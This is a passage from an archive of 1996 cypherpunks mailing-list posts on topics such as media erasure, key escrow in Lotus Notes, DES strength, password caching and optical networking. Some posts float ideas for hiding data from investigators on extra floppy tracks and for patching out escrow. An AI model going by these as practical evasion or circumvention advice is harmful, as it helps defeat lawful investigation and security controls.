hertz, depending on how you look at it) pulsing magnetic field, which 
REPEATEDLY saturates and re-saturates the magnetic domains in one direction 
and then the other, taking a "trip around the hysteresis curve" 60 times per 
second.  Residual magnetic fields are repeatedly reversed and thus 
overwritten, and quickly become totally and completely unrecoverable in a 
second or so.  (actually, far less, I'm just not proposing you stand there 
for a minute degaussing a single floppy!!!)

And there is a far more practical reason to NOT use a permanent 
magnet, and CERTAINLY not on audio-quality tapes.  Read heads can get 
inadvertently magnetized, and if you insert a disk or tape with a 
DC-magnetization on it "who knows what" might go wrong. (it would take a 
reasonably technical audiophile to tell you how much of a problem this could 
be on audio cassette tapes.  It is possible that digital-writing floppy 
disks heads are comparatively immune from this effect, but don't count on 
it!)   (However, using an 
AC demagnetizer on a floppy after you've zapped it with a permanent magnet 
will remove whatever residual DC magnetiziation was present.


>Two semi-on-topic questions:
>
>1. Does anyone know a cheap way to recover the traces of the previous
>(overwritten) recordings on the media?

Cheap?  No.


>2. If a cheap way exists, has anyone considered stego use of it?

Doesn't sound particularly practical.

I can think of a slightly better way, MAYBE.  There are, what, 80 tracks on 
the typical floppy disk, right?  (okay, I  may be wrong about this...).   
But it would be physically possible to write a few more tracks onto the 
floppy before you hit a mechanical stop.  Putting data THERE while the 
typical system thinks there are "only" 80 tracks would hide it reasonably 
effectively.

Note:  I'm not over-rating the effectiveness of such a system.  It wouldn't 
faze the CIA or the NSA, but it would probably get by the local police, the 
state police, and maybe even the FBI unless they had written a program 
specifically designed to search "illegal" tracks.  Label the floppy, "Doom 
program, great game!" and they'll probably waste most of their time blasting 
monsters rather than looking for tracks 80, 81, 82, etc.)

Also, this is certainly not a new idea.

My public key.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi1zvWcAAAEEAKmSqngLWK2N2gOJKPtjF9VCfSkXY+XUZBRCbbFU71uH/dLX
C2Uq6wFS8alRgMc3rp90JnnJ/6eJqXwMjCunogwucWOaU7S/w+OwjOG9fUqsXIA6
2j25Wtjce65mbp0TKLAzwMb/P/Qq7BlclqhuKzfVBH7dIHnVAvqHVDBboB2dAAUR
tBFKYW1lcyBEYWx0b24gQmVsbA==
=G3LA
- -----END PGP PUBLIC KEY BLOCK-----



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQFn5/qHVDBboB2dAQG1BgP/Wbx4lda9RCp9mjeqBGEOUxRtR98/ZoQY
QH4QbreNEtskiHKjEPVpaab5oqCzpnkz3wX+Ve1EZ45kMNYs86gpWqb36IcsDBAi
Ic9ZeUr2l0BEz0cZbyTiZPhN1J9LW0mDjLW5Zg83uaUKCwCa6MFuZP7iObmlAUjL
GC3CsymuBSo=
=xx4B
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 21 Jan 1996 15:37:12 +0800
Subject: Re: Encryption and the 2nd Amendment
In-Reply-To: <ad266ee7090210043077@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960120141323.12476B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




> After all, it is well-established--whether we like it or not--that the
> government can regulate and control access to  [...]


       I *think* the only thing that's been affirmed, is that the feds 
can *tax*  weapons transfers.     I think the one particular case is 
called "Rock Island" or something like that. The defendant was 
*acquitted* of possessing an un-registered machine gun, because the 
authority to tax transfers of newly-manufactured machine guns, no longer 
exists. This is an over-simplifaction. Anyway, the point is, the 
defendant was acquitted right there in district court.

Tim, I don't think you'll be able to find anything in the Code of federal 
Regulations or the United States Statutes, which outlaws the manufacture 
or possession of a fission device in your basement.  I'm not even 
positive if it fits the legal definition of a "destructive device", whose 
*transfers*  are taxed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Sun, 21 Jan 1996 15:40:59 +0800
To: cypherpunks@toad.com
Subject: E-Cash and the Treasury Department
Message-ID: <199601201435.OAA19801@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


[POSTED BY: PUBLICUS ANONYMOUS
("Oh! That Publicus.")
("Oh! That Anonymous.")

INTELLIGENCE 
N. 269, 24 July 1995 
(Vol. 16, N. 15) 
Publishing since 1980 
 
 
Editor 
Olivier Schmidt 


Intelligence, N. 269, 24 July 1995, p. 11 
 
 
RONALD K. NOBLE - U.S.A. 
 
 
This time the U.S. Treasury Department hasn't jumped the 
gun in announcing that Ronald K. Noble, the hard-line 
Undersecretary for Enforcement at Treasury, was the new 
chairman of the Financial Action Task Force on Money Laundering 
(FATF) set up in Paris by the G-7 group of industrialized 
nations in 1988.  Last year at this time, the Netherlands took 
over the chair but U.S. Treasury wrongly issued an announcement 
that Noble was occupying the post.  Asked by "Intelligence" for 
an explanation, Treasury simply stated that it had "made a 
mistake."  Last year in Washington, Noble backed bankers 
complaining about the several million Currency Transaction 
Reports (CTR) they were required to file every year.  Noble and 
the banks said that filing was not necessary on deposits by 
businesses like department, grocery and convenience stores that 
routinely make fluctuating large deposits in cash, and Treasury 
intended to slash CTR filings by 30 percent.  Critics contend 
that businesses exempt from CTR filing will quickly be used by 
criminal organizations to launder their cash. 
 
As Undersecretary for Enforcement at Treasury, Noble 
oversees five of the eight largest federal law enforcement 
agencies in the U.S.:  the Secret Service, U.S. Customs, the 
Bureau of Alcohol, Tobacco and Firearms (ATF), and the IRS 
Criminal Investigation Division, and the Financial Crimes 
Enforcement Network (FinCEN) which was taken over by Treasury's 
Office of Financial Enforcement under Noble last year at this 
time.  At the FATF, Noble replaced Leo Verwoerd of the 
Netherlands on 1 July 1995 and will direct the FATF for one 
year.  Following last year's resolution to "monitor 
implementation of the forty Recommendations of 1990 by its 
members," Noble intends to use forceful methods including open 
criticism in annual FATF reports of non-complying members, 
followed by written reprimands from the FATF chairman to 
recidivist member countries, and finally high-level mission 
visits to the faulty country.  Greece has already been 
criticized twice for its lack of progress in implementing FATF 
recommendations. 
 .





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jan 1996 21:28:00 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <m0tdmLW-0008zuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:23 AM 1/20/96 -0800, Timothy C. May wrote:
>At 3:38 PM 1/20/96, Dr. Dimitri Vulis wrote:
>>tallpaul@pipeline.com (tallpaul) writes:


Interestingly, we wrote almost identical responses to Dmitri, although 
admittedly you won the "time race."

Is it:
1.  "Great minds run on the same path"?
or
2.  "Fools think alike"   <G>


>3. A time-varying field is preferred. Bulk erasers work this way, by
>plugging into an a.c. socket and generating a time-varying field. And even
>these are getting harder to use to erase video tapes, for example, due to
>the high coercivity of modern media. Most folks I know no longer even try
>to bulk erase tapes.

Video tapes, yes.  Audio cassette tapes, maybe.

However, they should still be useful for floppies, for two reasons:

1.  Distance to the media is far smaller than to the average distance to the 
inside of a videotape cartridge.  (floppy cases are thinner.)

2.  The volume of material to be erased is FAR smaller than a typical 
videotape cartridge.  The middle of the tape of a 1/2" wide videotape spool is 
self-shielded by at least 1/4" of videotape; a 3.5" floppy disk is shielded 
only by distance.  (actually, the sliding doo-hickey over 3.5" floppies 
probably acts as a shield, too.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQF04vqHVDBboB2dAQGlhwQAmS2fbPTCdcyRsqsKukaUfgesqultJ15J
ZaAM0CUK1MH96szfHltSM7JkVr/t2wuDxY8gMZnmW5Jz1XUxDy+/a0NsJxkDWV+R
9eNOAKdsFaaV3xmIOBvZyIIU8RHgSw16Z0DZIDJhV/kZgACqfndn0YOHG4ESNe5T
VrpCuKLBdSo=
=T9tq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sun, 21 Jan 1996 21:29:03 +0800
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
In-Reply-To: <199601200222.VAA01246@jekyll.piermont.com>
Message-ID: <9601202044.AA15816@outland>
MIME-Version: 1.0
Content-Type: text/plain


> > If they're nasty, they'll check on the receiving side as well, to
> > ensure that the LEAF and/or the espionage-enabling key have not been
> > patched in the sending 'International' version.
> 
> Nearly impossible. Why? Because they can only include the public key,
> and not the private key, of the GAK authority in the code. You can
> encrypt the three bytes of key, but it is very hard for a receiver
> other than the govvies to read them. There is no shared secret
> information or private information available, ergo, they can't check
> their LEAF equivalent.

	If the 3 GAK bytes are derived from the key & the secret key,
couldn't it be done this way:

	* sender creates 64-bit session key K
	* sender encrypts K with recepient's public key (say P_r(K))
	* sender encrypts top 3 GAK bytes w/GAK key

	The recipent can verify the GAK bytes by using it's copy of
the GAK key on the top bytes of the session key.  If the encrypted
GAK bytes match what was sent, then they're valid.  No need to have
the secret key.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 21 Jan 1996 11:27:34 +0800
To: cypherpunks@toad.com
Subject: Idea for "friendly" Windows password hack
Message-ID: <Pine.ULT.3.91.960120151615.6696B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


 [Let me say up front that beyond a lot of perl hacking, I've never had
 a need to code my way out of a paper bag, so this is not something I'd
 be able to implement myself, at least not without a month of study.]

OK, so we know how to crack .PWL files, and how any program (virus, trojan
horse, Windows Help file calling a DLL beginning with ASCII 229 so that
virus scanners can't see it) can obtain usernames, passwords, etc. even if
persistent "password caching" to disk has been turned off. 

How might Microsoft (or someone else) address this without forcing users
to quit all applications and "log out" of Windows to purge the temporary
"password cache" in RAM? I.e., I don't care much about and know I can't
count on the security of my PC as such, and it's really convenient to
leave a zillion Popular Web Browser windows open when I walk out of my
office, but I don't like the idea that anyone might walk up to my PC and
log on as me to the otherwise (more or less) secure servers I use. 

In thinking about how MacOS PowerTalk deals with this by allowing the user
to "lock" and "unlock" their keychain at will, it occurred to me that
there's no particular reason we should just have to "look, don't touch"
the password cache in RAM. After all, it's our insecure single-user
operating system, and our passwords. 

Why not provide a way to grab the passwords cached in RAM, encrypt them 
securely, put them away somewhere, and scramble the original copy of the 
passwords in RAM so that Microsoft's code can't get to them?

We don't need no steenking user interface. Actually, the first cut at
this wouldn't really need to encrypt them securely, but just deny them to
the OS, and restore them to the OS, on demand. 

Just a quick demo of how Microsoft can and should resolve this issue would
have people beating down our door, and we'd unambiguously be the good
guys. Because we'd be providing the solution, there would be no further 
moral qualms about posting full details and full source code.

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Sun, 21 Jan 1996 05:53:56 +0800
To: daw@quito.CS.Berkeley.EDU
Subject: Re: Hack Lotus?
In-Reply-To: <199601192214.RAA28470@bb.hks.net>
Message-ID: <9601202117.AA28623@w20-575-84.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Pardon my lack of faith in most crypto implementations, but do you
think it is possible that (in the first version of Notes at least) the
escrowed 24-bits will just be stored plaintext in the executable?  In
which case, a little disassembly, and we can create a hack to enable
all 64-bits.  (Of course, communications from this hacked version will
only be readable by other hacked versions or US versions.)

Anyone else think is probable?

-James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Sun, 21 Jan 1996 11:58:42 +0800
To: corey@netscape.com
Subject: Re: Elitism on Cypherpunks
In-Reply-To: <199601200131.RAA26034@urchin.netscape.com>
Message-ID: <9601202118.AA28626@w20-575-84.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Point well made, dear sir!




   i, 19 Jan 1996 17:31:29 -0800
   X-Sender: corey@engmail.mcom.com
   X-Mailer: Windows Eudora Version 2.1.1
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   Date: Fri, 19 Jan 1996 17:29:22 -0800
   From: Corey Bridges <corey@netscape.com>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   At 08:55 PM 1/18/96 -0800, Alan Olsen wrote:
   >It has been said that "Cypherpunks write code".  They must do more than 
   >that.  Cypherpunks need to teach.

   Just remember you brought this up...

   Not all of us even write code. Some of us write (horrors!) books! Yes, my
   brethren, I earn my pay as a lowly scribe. Do I code? Nope. Am I a
   Cypherpunk? Christ, I don't care. I'm on this mailing list; that works fine
   for me. My brain expands almost daily from contact with such seditious sods.
   Do I contribute to the health and growth of this list? Maybe. Do I preach
   the Cypherpunk doctrine through my work at my company? Definitely. 

   Just thought I'd point out that we aren't all code-monkeys. (And I mean that
   in the best sense of the word.)

   Corey Bridges
   Security Documentation
   Netscape Communications Corporation
   home.netscape.com/people/corey
   415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sun, 21 Jan 1996 11:46:09 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: HAVAL (was Re: crypto benchmarks)
Message-ID: <199601202200.RAA09207@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Thanks.  It looks like F4 and F5 are improved.  Do you know how these
> optimizations can be done in general?  I tried playing with F2 
> as a multivariate polynomial with coefficients in GF(2) in Mathematica.  
> This seems to work and I found several equivalent expressions that take 
> 13 operations (the original also takes 13 operations).  Is there a tool 
> that can do this automaticly?

I did the optimizations by hand.  Simple rules of boolean arithmetic 
and logic (you know, things like Demorgan's Law applied to binary 
operations).  Other processor-related optimizations can be done by 
hand, such as add x,x instead of shl x,1.

I think I had the same proglems with F2 as well.  Couldn't find a way 
to optimize it reasonably.

 > The biggest problem I have with HAVAL now is that with 4 or 5 passes the
> transform functions are larger than 10k even with compiler optimzation for
> size.  Since the Pentium L1 instruction cache is only 8k, this makes HAVAL
> with 4 or 5 passes extremely slow.  Do you have ideas how I can fit the 
> transform functions into L1 cache?

You might do some creative optimization to use more registers than it 
does.  I haven't looked at it in a while.  The code was so huge and 
slow compared to optimized MD5 and SHS that I have up using it for an 
unfinished encrypted file system.

Rob.
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jan 1996 10:03:55 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: DES in real life
In-Reply-To: <Pine.SUN.3.91.960120111743.16171F-100000@viper.law.miami.edu>
Message-ID: <199601210001.TAA03292@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> Recognizing that DES is not the best thing out there, but that it is
> better than RC40 and life is a series of cost/benefit tradeoffs and that

Thats RC4, and it isn't neccessarily better than RC4, especially if
the RC4 key length is reasonable. No one really knows the strength of RC4.

> 1) Suppose you are approached by a corporate client who believes that they
> can get export permission for DES (but nothing stronger, i.e. no 3DES). 
> What kind of real-world, non-banking, applications is DES just too weak
> for today?

I'd guess that anyone who consideres their messages to be worth more
than a few hundred bucks a pop has cause to worry, because thats the
upper limit on the cost of cracking DES keys these days.

> 2) How long before DES becomes generally unsuitable for (A) corporate 
> (B) personal use [please keep the threat model on which this question is 
> based in mind -- threats *other than* the US government wiretapping you]?

I'd say it is unsuitable for anything approaching a valued corporate
secret today. Personal use? Well, the threat model there is all
important. Certainly your cousin can't crack DES keys -- yet.

> 3) Do you have a view as to whether DES (A) will and (B) should be 
> recertified next time the issue arises?

DES should not be recertified. I have no opinions on what the
government will do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jan 1996 11:34:05 +0800
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: Web site with Updated Telecom Bill Info
Message-ID: <199601210319.TAA23764@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:05 AM 1/20/96 -0500, you wrote:
>Our beloved Vice President said: "We are very gratified that the bill
>contains the provisions for the V-chip that will enable families to
>control the contract of television programming that comes into their homes

yeaj, families like Al & Tipper Gore....

>and that it contains a provision to make advanced telecommunications
>services available at low cost to schools, libraries and hospitals" 
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jan 1996 11:33:17 +0800
To: daw@quito.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Hack Lotus?
Message-ID: <199601210319.TAA23787@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:14 PM 1/19/96 -0500, daw@quito.CS.Berkeley.EDU (David A Wagner) wrote:
>I was talking to Avi Rubin from Bellcore last night, and he speculated
>that maybe the 64 bit key was a fixed one, generated once at installation
>time and escrowed with the government then.

To do that, the user's system have to communicate with the government,
which would be unlikely and avoidable.  Alternatively, if Lotus is willing
to release copies with different serial numbers (either on the disk
or printed on the label), the installation process could include
public-key encrypting a 64-bit key for the user with the GAK key,
generating a (say) 512-bit encrypted key which could be dragged around
in the headers or (if they wanted to minimize overhead) handed out
in 64-bit chunks with every message or some such silliness.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 21 Jan 1996 01:02:52 +0800
To: cypherpunks@toad.com
Subject: re: CAPI signing
Message-ID: <199601201647.IAA22500@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 1/18/96 -0600, Mike McNally wrote:
>
> A Microsoft person just responded via direct e-mail that they'll do
> CAPI signing in the United States (the word "only" wasn't in there,
> but that certainly was the implication).  

In order to get government approval of CAPI, Microsoft made concessions
that we will doubtless find offensive.  But once CAPI is in place and
working, then those concessions can be taken back.

CAPI is a good thing:  It is sound design and it will open another 
front in the conflict.  Once software is around that has crypto hooks in it, 
we can then deal with restrictions on CAPI modules using technical 
and political means.  I expect that technical means will be effective 
and successful.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Sun, 21 Jan 1996 21:30:45 +0800
To: cypherpunks@toad.com
Subject: You want to read MY e-mail?
Message-ID: <199601210259.UAA08926@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


   from the Nando Times-


DENVER (Jan 20, 1996 01:16 a.m. EST) -- A college student's request to look at
the electronic mail of several high-profile state politicians got lawmakers'
attention Friday.

Becky O'Guin, a senior journalism student at Metropolitan State College of
Denver and a reporter for The Capitol Reporter, a student newspaper that covers
legislative action, stirred up the ruckus.

She sent a letter to Sen. Charles Duke, R-Monument, asking for all of his e-mail
messages from Jan. 1 to Jan. 16 and cited the Colorado Open Records Act as her
right to get it.

The letter noted that Colorado law would force him to pay court costs and
attorney fees if a member of the public "has to take official action to enforce
his or her right to view a public record."

That really miffed legislators.

Lawmakers said they'd get a legal opinion on whether they must disclose their
electronic-age messages and may pass legislation to make sure their messages
have some protection of privacy.

Senate Majority Leader Jeff Wells, R-Colorado Springs, said he and Senate
President Tom Norton, R-Greeley, got similar requests, but verbally.

Personally, Wells said, he believes e-mail is privileged information unless it
is specifically identified as public information under existing law.

A bill by Sen. Paul Weissmann, R-Louisville, to make e-mail as privileged as
telephone conversations was killed in a Senate committee.

A somewhat stronger bill still rests in the House.

O'Guin, meanwhile, was standing her ground, although she admitted to being a
little surprised about the uproar.

"The way I read the open records statute, those are open records," O'Guin said.
"I was very serious about the request. What I was looking for was to find out
how much public business is conducted through e-mail.

"If they're using e-mail to send memos back and forth discussing public
business, I see that as public record," she said. "Most of them don't (have
e-mail), but about 30 people have software that allows them to send e-mail back
and forth."

She said only Duke and Gov. Roy Romer have been sent letters so far, but she
intends to send them to other high-profile politicians.

Jim Carpenter, press secretary for Romer, said his office was "looking at all
the issues, all the options."

Duke said he has always complied with requests for public records, but said the
request for e- mail messages goes too far.

"I'm disturbed by it," Duke said.

(John Sanko writes for the Rocky Mountain News in Denver.)


   OK, if _I_ can't read your e-mail Mr. Legislator, why should you
be able to read _mine_?

-
--scottst@ionet.net---------------------Scott Staedeli--
   >~<^xXx       | "There is no reason for any indiv- 
        xX   #   | idual to have a computer in their
      (XXX) #    | home."
    (XXXXXXX)    |  
DON'T TREAD ON ME| -- Ken Olsen, president of DEC, 1977
========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldberg@mars.superlink.net
Date: Sun, 21 Jan 1996 12:27:56 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601210258.VAA17721@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:21 PM 1/4/96 -0800, jim bell wrote:
>At 10:54 AM 1/4/96 -0800, you wrote:
>>>Previous exchanges deleted...

>>
>>(1) No single communication technology is appropriate for every problem.
>>
>>(2) A technical fix could include having the receiver send steering orders
>>to the transmitter.  This solution would, of course, be a long way from the
>>low tech scavenged lens and 1/2 meter cardboard mailing tube technology I
>>was thinking of.
>
>I think you guys (further up the reply chain) are missing the point.  While
>IR does have stealth advantages in, say, wartime, for routine network usage
>everyone can be assumed to know where everyone else is, and where all the
>optical links are, etc.  There's no point trying to use link-location
>secrecy.  And presumably, encryption will provide all the
>message-secrecy/anti-spoofing functions required.  Simply ASSUME that the
>beams can be intercepted (although probably not intentionally cut).  That's
>why we're "cypherpunks," right?!?
>
>Secondly, IR beams can be plenty narrow enough to avoid inter-link
>interference, but at the same time wide enough to avoid beam-steering
>problems. Note: I'm assuming link distances of under, say 300 meters here.
>
>Previously, a point was made about the effects of fog cutting links:  Due to
>scattering, one of the reasons automobile fog lamps are 550 nanometer
>yellow/orange is to minimize the scattering that shorter wavelengths (400 nm
>blue, 450 nm green) are more prone to.  I would imagine that near IR at,
>say, 890 nm would be dramatically less sensitive to such scattering.  1400
>nm might be even better.  Rain might be a different story.  But then again,
>if we're limiting the links to around 300 meters, the total amount of water
>between "here" and "there" CAN'T be all that great.  And in addition, one of
>the advantages of computer networking over telephone-type networking is that
>we can "tolerate" (although, not LIKE) the occasional necessity of
>re-transmitting data.  And dynamic re-routing is probably far easier than
>for real-time telephone-type data.
>
>>From the standpoint of computer networking, the main benefit of IR is to
>cross rights-of-way without permission or trenching (or stringing cables
>from telephone poles) in urban and suburban areas, allowing data transfer
>near-fiber speeds.   In an urban setting, a single tall building could
>become a central hub for most of its nearest neighbors.   I don't anticipate
>IR being used "to the home" (especially since residential areas have trees,
>etc); rather, I would imagine that it would be used to feed the occasional
>top-of-the-telephone-pole microcell, with very-low-milliwatt (or high
>microwatt) RF going the last 100 meters or so to the home.  This would allow
>a non-phoneco, non-cableco company to offer bidirectional networking in an
>entire residential area with an absolute minimum of costs/rights aquisition.
>
>
I can give you the benefit of some experience I have had with optical data
transmission systems.  We used IR lasers to span an approximately 800 meter
distance between buildings, and the results were dreadful.  Never again!
Fog took the system down completely, on a regular basis here in New Jersey,
as did even moderate snow.  Rain was much less of a problem, surprisingly,
even heavy rain rarely did more than raise the retransmission rate and lower
throughput somewhat.  Further, the beams were very narrow, and over that
distance minute changes in transmitter orientation would cause the link to
go down.  I am talking about changes due to expansion and contraction of
metal mountings with temperature, for instance.  Mounting direct to masonry
would probably have helped a lot.  Then, there are the things like trees
growing into the path over the course of the summer, telephone cables
swinging into it intermittently in high winds, etc.  Shorter paths allow
greater control over environment, certainly, but I would be very careful
about deploying large numbers of these types of systems.  Spread spectrum
microwave radio is a great improvement, but nothing seems to beat properly
installed glass fiber for reliability.
Frederic M. Goldberg   WA2BJZ   EMT-D





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jan 1996 14:15:14 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <m0tdscr-0008xLC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 AM 1/19/96 +0100, Anonymous wrote:

>On 15 Jan 96, Rich Graves wrote:
>
>> But government employees should only be held accountable for 
>> their actions as government employees. If the situation 
>> warrants, go ahead and tap their offices, break into their work 
>> computers, etc. But don't fuck with their personal lives.
>
>Oh, my! A little sensitive, are we? Aren't you even a *little*
>struck by the fact that fucking with people's personal lives 
>is *precisely* what errant government officials *do*???

I LOVE this response!  This is the kind of comment that totally destroys 
Rich Graves' position: Graves' would allow the government to screw with US, 
as ordinary citizens, while we're denied the ability to defend ourselves.  

Maybe I was excessively rude by calling Rich Graves a "fucking statist" on 
this list, but I don't think I was at all inaccurate. 

>We Jurgar Din


Thank you for putting Rich Graves in his place.
Jim Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 20 Jan 1996 19:50:03 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: CryptoAPI and export question
In-Reply-To: <199601200402.UAA01863@ix6.ix.netcom.com>
Message-ID: <199601201137.WAA20395@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Tom Johnston <tomj@microsoft.com>
  and Bill Stewart <stewarts@ix.netcom.com>
  and cypherpunks@toad.com

Bill Stewart wrote:
...
> 3) Consider the case of a contractor who buys the development kit,
...
> into the US.)  He probably can't legally re-export the code, or export
> the signed version of it, but he can export the signature itself,
> since that's not cryptographic code, and the foreign company can
> reattach it to their original document, which you have now signed....
...

This is not that difficult for MS to work around - for example, they
could modify the code harmlessly before signing it. Unless you
know *how* they modified it, you can't reproduce it.

Example: some assembly instructions have more than one machine
code representation. MS could put some kind of cryptographically
strong pattern into these (ie one that can't be reverse-engineered).

ObCrypto: Stego in .EXE files?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMQDT7ixV6mvvBgf5AQEEAwP/fJqfsCP1sA4ojwivHBeVxLpSfpKXEjpp
MgcHSVnFWkw1ezPUAmC9tugT0NEtIIDDs4ntDHUUa6Ki/bH1QFxqD5Gw8OCeGDJU
UQc/Y1o0K6XSAsiYWfEOE6fCnG3pbxGAc8s3Sz+TZbAhr0pqXIf3t1t6CNP3+dBn
Gnuq+OyIv5E=
=tfG3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Sun, 21 Jan 1996 15:08:00 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Enquirer
Message-ID: <m0tdtfS-000UzEC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain




>    THE CYPHERPUNK ENQUIRER
> 
>                    "Encyphering minds want to know."
> 
<snip...great stuff deleted>

ROTFLM?O.....
We NEED stuff like this in these stressful times. <G>.
Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sun, 21 Jan 1996 12:00:54 +0800
To: cypherpunks@toad.com
Subject: Restricted FTP & Web servers wanted.
Message-ID: <9601210348.AA07059@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm trying to persuade the powers-that-be at my employer that we
can use a restricted access, encrypted Web server to distribute 
beta copies of our products (which include encryption) to test sites.
We're mainly interested in avoiding any confrontation with ITAR.
Since we can restrict by IP address, and unlike the MIT PGP site,
will be encrypting the link, I think we're in the clear.

However, to aid me in making the case, I'm looking for other
IP restricted servers to show that this is an accepted practice.
Please drop me a line if you know of any, and I'll summarise
next week.

	thanks,
		Peter
PS:
	Does anyone know of a Domestic strength SSL web browser
which allows you to install trusted roots (Netscape does not meet
these conditions, in any released version).


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 20 Jan 1996 20:13:25 +0800
To: trei@process.com
Subject: Re: Hack Lotus?
In-Reply-To: <9601200326.AA09366@toad.com>
